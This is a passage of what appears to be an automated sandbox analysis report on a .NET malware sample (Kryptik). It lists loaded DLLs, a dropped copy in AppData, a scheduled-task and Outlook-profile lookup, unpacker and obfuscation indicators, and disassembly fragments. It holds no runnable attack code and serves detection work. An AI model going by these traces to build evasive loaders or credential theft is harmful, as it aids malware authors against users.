Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: eLRW.pdbSHA256 source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, eFzAvsOm.exe.0.dr
Source:	Binary string: eLRW.pdb source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, eFzAvsOm.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.5130000.4.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	.Net Code: awPeNwB563 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	.Net Code: awPeNwB563 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.26b9dac.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 10.2.eFzAvsOm.exe.2f29b00.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: 0xEECF1AE6 [Mon Dec 17 02:37:26 2096 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_04B6B8B0 push eax; mov dword ptr [esp], ecx	0_2_04B6B8B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C02E30 push ecx; retn 0006h	0_2_06C031EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C01784 push edx; retn C006h	0_2_06C03292
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C0AE01 pushfd ; retn 0006h	0_2_06C0AE02
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C03FE0 push edi; retn 0006h	0_2_06C03FE2
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C05F98 push esp; retn 0006h	0_2_06C05F99
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C03470 push edx; retn 0006h	0_2_06C03472
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C05C28 pushfd ; retn 0006h	0_2_06C05C29
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C0ADB0 pushfd ; retn 0006h	0_2_06C0ADB2
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C035B1 push ebx; retn 0006h	0_2_06C035B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C0321F push ecx; retn 0006h	0_2_06C03222
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C03A2F push ebp; retn 0006h	0_2_06C03A32
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C03A37 push ebp; retn 0006h	0_2_06C03A3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C03341 push edx; retn 0006h	0_2_06C03342
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C038E0 push esp; retn 0006h	0_2_06C038E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C04099 push edi; retn 0006h	0_2_06C0409A
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C031B0 push ecx; retn 0006h	0_2_06C031EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C03929 push ebp; retn 0006h	0_2_06C0392A
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1AE88 push cs; retn 0006h	0_2_06C1AE8A
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1CEA9 push ds; retn 0006h	0_2_06C1CEAA
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1AEAF push cs; retn 0006h	0_2_06C1AEB2
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C156B7 pushfd ; iretd	0_2_06C156F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1CEB8 push ds; retn 0006h	0_2_06C1CF62
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C15613 pushad ; iretd	0_2_06C15639
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1AE19 push cs; retn 0006h	0_2_06C1AE1A
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1AE23 push eax; mov dword ptr [esp], edx	0_2_06C1AE2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1CE30 push ds; retn 0006h	0_2_06C1CE32
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1CE3E push ds; retn 0006h	0_2_06C1CE52
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1ADD8 push cs; retn 0006h	0_2_06C1ADDA
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1BAA1 push ss; retn 0006h	0_2_06C1BAA2
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1CA19 push FFFFFF8Bh; iretd	0_2_06C1CA1B

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Static PE information: section name: .text entropy: 7.76007204971442
Source: eFzAvsOm.exe.0.dr	Static PE information: section name: .text entropy: 7.76007204971442

Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, dfeKHE6x5d31Kf9Po5.cs	High entropy of concatenated method names: 'mOnsK0d6q0', 'DqGsu1u90G', 'o4CsOXYyHg', 'eKrOvvHast', 'c1VOzbauT2', 'mFTsFqcsGs', 'FsYsBQLujp', 'dqtsVChBae', 'SVFsqQkjjo', 'vlhseEFCYm'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, bmYmCFonUgDmn1KOk8U.cs	High entropy of concatenated method names: 'ffQnd4FNuh', 'TurnrTyYTj', 'o1qnNr1BwG', 'Bf3nmkC38i', 'i0xn2TdNIA', 'yn5nCAAgX4', 'WCCnpWFTyu', 'FJnnQEO92w', 'mYjnDiyIO2', 'cI1nROqhDc'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, Ck9KUH03mPl1BXVZKg.cs	High entropy of concatenated method names: 'MkLHIOM7fI', 'iddHM5IchS', 'z94H9hHlHQ', 'TMRHWmkHuc', 'XGqHooTbQX', 'JMrH4ud4VL', 'wXNHhGYLrT', 'GMPHaDNtqC', 'oEtHxDo8to', 'yP4HvHKHDF'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, I6JNUBSBDIKCNSl5LH.cs	High entropy of concatenated method names: 'C1P7ZLyT15', 'DYl7Xcx8jW', 'mk37fJ1DjG', 'jS97U6kKJ0', 'IS37IjXGcR', 'uE47y1b0l0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, c35RxChhngPqAk42Vr.cs	High entropy of concatenated method names: 'fbmnBwxr9x', 'xUbnqNpN7q', 'ukfneCeKEO', 'LqOnKlJQ8k', 'w6DnHnMngQ', 'EVlnLuGCxJ', 'agVnO4rLVX', 'YcE7hifMQK', 'tCJ7amwGxX', 'RN87xQ0awb'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, RBoRtSQu7sDQrMTu3r.cs	High entropy of concatenated method names: 'kEiOjHY6bj', 'vc8OHpHZoG', 'WtxOL18Md0', 'RUYOsag94X', 'q2cO3x3vCO', 'UYXLom85jr', 'vDQL4PO2hT', 'C5CLhChjvr', 'GuNLa8lbYw', 'cpXLxVooMk'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, Pc2Bo6lEd4fR2c4BCe.cs	High entropy of concatenated method names: 'Dispose', 'CSQBxqKsWH', 'f1iVXck80l', 'V5M66Wy9ct', 'ib7BvWUWsI', 'F5hBzgT4Fp', 'ProcessDialogKey', 'IIWVFnPhSb', 'jkSVBEkrn8', 'XZSVV9MsFS'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, sL9ieooCXKnduqu9K7v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QnltIyLQBF', 'XRAtM1Frap', 'CNst98DlaE', 'wMFtWbbTp1', 't2EtoLh9hp', 'kP0t4g6tLF', 'hDythlwYhZ'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, TjrqVw3PJQ3Sx8WHOJ.cs	High entropy of concatenated method names: 'ETJNMG6yZ', 'ppBmtpmIh', 'udTCPHIBy', 'xhhpA14RQ', 'rnTDsAPym', 'wvLRFUt3M', 'ibR8sMgLKa5KE1DOEg', 'yCdsmO1HgxTgnHa1AP', 'Chh7dswof', 'P5etyU6GP'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, YwRA9L1WpLER8u0VFY.cs	High entropy of concatenated method names: 'xwZGEed6D4', 'lT6G13Jxli', 'aInGIbDHT1', 'VYvGMsoMX2', 'tDRGX2nX8o', 'aPrGfsCdue', 'jAcGUNadEk', 'yW5Gy463gO', 'NpqGAtW9qE', 'GFmGbJ9QG0'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	High entropy of concatenated method names: 'NQfqjYYItI', 'bSHqKbercY', 'smbqHp1OGE', 'iFuqucVW1G', 'EAxqL0mDR5', 'L9MqOBoo0F', 'gS5qsfjqoF', 'q8Uq3kM9aX', 'TawqkDhVXe', 'clGqYypCHe'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, VsXexiPwgkdpkYOIjb.cs	High entropy of concatenated method names: 'l0HJQHnmHw', 'z5xJDg1xyO', 'u2UJZxk3ea', 'NS6JX7AFVt', 'GERJUGvTCU', 'z3IJyU159l', 'PDVJbr1b07', 'zxdJ0u25j3', 'q3hJEy52iQ', 'QZGJTSD5ai'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, bH4LmEktTbgyfu1nmW.cs	High entropy of concatenated method names: 'uY07K3Soa1', 'fUc7HVm16k', 'bKB7u9fMTv', 'PhB7LHxi21', 'dDx7Of7lpG', 'zRO7sM2DO2', 'wIZ73MBd7G', 'XdI7kcPpTh', 'ieK7YjtuTI', 'Y7c7cRjFtP'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, dnVFUnFdWwv7se0265.cs	High entropy of concatenated method names: 'VgWumxXTHq', 'dTNuC724Eb', 'ogquQkF662', 'jhxuDbMsVI', 'onauGqT5Q7', 'uV3u8DLOfF', 'VLMuPpbuwY', 'sQlu7auoOr', 'LyCunWRm3B', 'wvautPo0Ef'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, khmUE4uXWX2TkVb03Y.cs	High entropy of concatenated method names: 'ToString', 'Ls68Tg32Yh', 'Fsr8Xjt0vi', 'g6d8f1FuKC', 'iK08U3hCI6', 'PTt8ymY2Vl', 'n4S8ABTI4T', 'zic8bIHa3A', 'CBi807uIxp', 'nj08SLdBb8'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, J7KEIN8ETF49kcU0Zj.cs	High entropy of concatenated method names: 'a2SBs9u0iD', 'uBoB3xPJjJ', 'DVsBYB7Q7s', 'of7Bcqu0jL', 'X9iBGOEkw4', 'qEKB8hljHK', 'Oran9tTESkTQ162TIk', 'fdNKdplnQCHcmbY9HP', 'pqpBBTSYhD', 'NfrBqHoBtS'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, PnSHUJG13oNu5hJSUf.cs	High entropy of concatenated method names: 'bM4L2mwR3t', 'LXMLpM0xMl', 'q0AufFeork', 'qgMuUSLmxw', 'AO4uyjAfJk', 'XZKuARgrhm', 'ni7ubNT1y6', 'bs0u0pCOk9', 'ok0uSccUjk', 'WaGuEOfm0h'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, kNQSvGzjja851KY6JG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hm4nJjUnyZ', 'oIGnGJeknw', 'cvZn8qqbPQ', 'nDNnPGQYx7', 'Vy7n7G3Wbj', 'USAnn7KgDd', 'DClnt5vriC'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, m0Q6g3tGVDoEV2HkJB.cs	High entropy of concatenated method names: 'V0EPalLMRw', 'rIXPvwwMXm', 'TkH7Fiac9X', 'JGv7BQRgOZ', 'ze3PTc1WwK', 'WrrP1dGMI6', 'OG6PwfQS7K', 'OU9PIb1StU', 'VNNPMCEBwu', 'VFlP9h9iJv'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, audrBvVO2OopYIUgn9.cs	High entropy of concatenated method names: 'na0sd0QW37', 'kBHsr1JyR9', 'IQasNRy2RM', 'Y47smF98c0', 'uqCs2lRhOu', 'FtCsCR9rKh', 'bPdsppBNGu', 'PaAsQsRYGh', 'rvKsDOwipy', 'kPmsRrKp9b'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, dfeKHE6x5d31Kf9Po5.cs	High entropy of concatenated method names: 'mOnsK0d6q0', 'DqGsu1u90G', 'o4CsOXYyHg', 'eKrOvvHast', 'c1VOzbauT2', 'mFTsFqcsGs', 'FsYsBQLujp', 'dqtsVChBae', 'SVFsqQkjjo', 'vlhseEFCYm'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, bmYmCFonUgDmn1KOk8U.cs	High entropy of concatenated method names: 'ffQnd4FNuh', 'TurnrTyYTj', 'o1qnNr1BwG', 'Bf3nmkC38i', 'i0xn2TdNIA', 'yn5nCAAgX4', 'WCCnpWFTyu', 'FJnnQEO92w', 'mYjnDiyIO2', 'cI1nROqhDc'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, Ck9KUH03mPl1BXVZKg.cs	High entropy of concatenated method names: 'MkLHIOM7fI', 'iddHM5IchS', 'z94H9hHlHQ', 'TMRHWmkHuc', 'XGqHooTbQX', 'JMrH4ud4VL', 'wXNHhGYLrT', 'GMPHaDNtqC', 'oEtHxDo8to', 'yP4HvHKHDF'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, I6JNUBSBDIKCNSl5LH.cs	High entropy of concatenated method names: 'C1P7ZLyT15', 'DYl7Xcx8jW', 'mk37fJ1DjG', 'jS97U6kKJ0', 'IS37IjXGcR', 'uE47y1b0l0', 'Next', 'Next', 'Next', 'NextBytes'
